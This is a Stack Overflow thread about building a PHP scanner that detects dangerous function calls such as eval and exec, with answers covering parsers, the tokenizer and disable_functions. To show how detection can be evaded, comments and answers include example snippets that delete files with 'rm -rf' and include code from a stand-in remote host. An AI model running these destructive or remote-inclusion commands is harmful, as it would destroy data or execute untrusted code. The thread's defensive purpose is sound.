5

I have to make a script in PHP that will scan other PHP files to check for dangerous function calls like eval,exec . Is there any parser available that can give me a logical structure of code.

Or i have to go with Regex.

Thanks, any type suggestions are welcome.

Arshdeep

Edit: i am not considering it as "one shot kill all". I have some other things in mind too, but its still something that i have to do.

Improve this question
5
  • another question about this: stackoverflow.com/questions/1865020/… Commented Dec 9, 2011 at 13:27
  • Your code will not work, even if you inspect the file, it can use Reflection or other ways to hide the original function name. You will never be fully safe. You need to disable the functions that isn't allowed. Commented Dec 9, 2011 at 13:28
  • possible duplicate of Extracting function names from a file (with or without regex) -- A regex might be sufficient to detect possible occurences only. It won't see any $fn = "unlink"; $fn(); or other obfuscated calls. Neither will the tokenizet approach (which is slightly more complex, due to filtering class methods actually needs a mini parser). Commented Dec 9, 2011 at 13:29
  • 2
    Also the retarded security myth about eval(): That's just another name for include(). See also exploitable php functions. Commented Dec 9, 2011 at 13:31
  • 1
    just a warning: don't rely on this. There are nearly endless ways to do nasty things with your server. Think about file_put_contents('nasty.php', 'ex' . 'ec("rm -rf /");'); include 'nasty.php'; or even include 'http://badserver.com/nasty.php' Commented Dec 9, 2011 at 13:35

3 Answers 3

Reset to default
6

Don't, you'll only shoot yourself in the foot.

PHP is a highly dynamic language. You probably can't even imagine what possibilities there are to execute code. I had some attempts at preprocessing PHP for sandboxing and from my experience I can tell you that it is very hard to account for all cases. To get a rough overview of what you are facing, look at the exploitable functions list, which was created over time and still isn't perfect.

To answer your actual question, I maintain a PHP parser written in PHP. You could intercept all function calls by defining a node visitor looking roughly like this:

class MyNodeVisitor extends PHPParser_NodeVisitorAbstract {
    public function enterNode(PHPParser_Node $node) {
        if ($node instanceof PHPParser_Node_Expr_FuncCall) {
            if ($node->name instanceof PHPParser_Node_Name) {
                // static function name
            } else {
                // dynamic function name
            }
        }
    }
}
Improve this answer
Sign up to request clarification or add additional context in comments.

1 Comment

Yeh, i am not considering it as the sure-shot measure, but it will still hit good numbers i believe ? Many thanks for the link, super helpful .
2

You can use tokenizer to do that:

print_r(token_get_all('<?php exec("rm -rf *"); ?>'));

Notice in the output the third element which is:

[1] => Array
    (
        [0] => 307
        [1] => exec
        [2] => 1
    )
Improve this answer

2 Comments

Note though, that you would also get a T_STRING for pretty much any other identifier - like class names, constants, method names, etc.
lame ideal, what if the function is being called using variable variables, how would you detect that?
2

Just use disable_function and disable_classes.
This can be changed only at the php.ini level.

Improve this answer

Comments

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.